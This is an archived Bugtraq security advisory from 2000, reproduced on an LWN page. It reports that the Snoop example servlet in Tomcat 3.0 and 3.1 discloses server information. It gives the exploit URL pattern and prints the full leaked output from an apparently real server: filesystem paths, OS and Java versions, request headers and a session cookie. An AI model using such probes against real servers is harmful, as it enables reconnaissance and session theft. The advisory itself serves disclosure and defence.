![[LWN Logo]](/images/lcorner.png)
![[Timeline]](/images/Included.png)
|
|
|
|
Date: Wed, 19 Jul 2000 23:56:21 -0400 From: ET LoWNOISE <et@CYBERSPACE.ORG> Subject: [LoWNOISE] Snoop Servlet (Tomcat 3.1 and 3.0) To: BUGTRAQ@SECURITYFOCUS.COM [LoWNOISE] Snoop Servlet (Tomcat 3.1 and 3.0) ====PRODUCT: Snoop Servlet on Release Build 3.1 and 3.0 of Tomcat from Apache Software Foundation. http://jakarta.apache.org ====PROBLEM: The Snoop Servlet will give you too much info (PATHs, OS, etc.) ====EXPLOIT: http://narco.guerrilla.sucks.co:8080/examples/jsp/snp/anything.snp ==== Snoop Servlet Servlet init parameters: Context init parameters: Context attributes: javax.servlet.context.tempdir = /appsrv2/jakarta-tomcat/work/localhost_8080%2Fexamples sun.servlet.workdir = /appsrv2/jakarta-tomcat/work/localhost_8080%2Fexamples Request attributes: Servlet Name: snoop Protocol: HTTP/1.0 Scheme: http Server Name: narco.goverment.sucks.co Server Port: 8080 Server Info: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.1.8; AIX 4.2 POWER_RS; java.vendor=IBM Corporation) Remote Addr: xxx.xxx.xxx.xxx Remote Host: xxx.xxx.xxx.xxx Character Encoding: null Content Length: -1 Content Type: null Locale: en Default Response Buffer: 8192 Parameter names in this request: Headers in this request: Host: narco.goverment.sucks.co:8080 Accept-Encoding: gzip Cookie: JSESSIONID=To1212mC7833304641226407At Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Connection: Keep-Alive Accept-Charset: iso-8859-1,*,utf-8 User-Agent: Mozilla/4.51 [en] (Winsucks; I) Accept-Language: en Cookies in this request: JSESSIONID = To1212mC7833304641226407At Request Is Secure: false Auth Type: null HTTP Method: GET Remote User: null Request URI: /examples/jsp/snp/anything.snp Context Path: /examples Servlet Path: /jsp/snp/anything.snp Path Info: null Path Trans: null Query String: null Requested Session Id: To1212mC7833304641226407At Current Session Id: To1212mC7833304641226407At Session Created Time: 964047263477 Session Last Accessed Time: 964047528749 Session Max Inactive Interval Seconds: 1800 Session values: numguess = num.NumberGuessBean@6bfa9a1 ==== Efrain 'ET' Torres et@cyberspace.org [LoWNOISE] Colombia 2000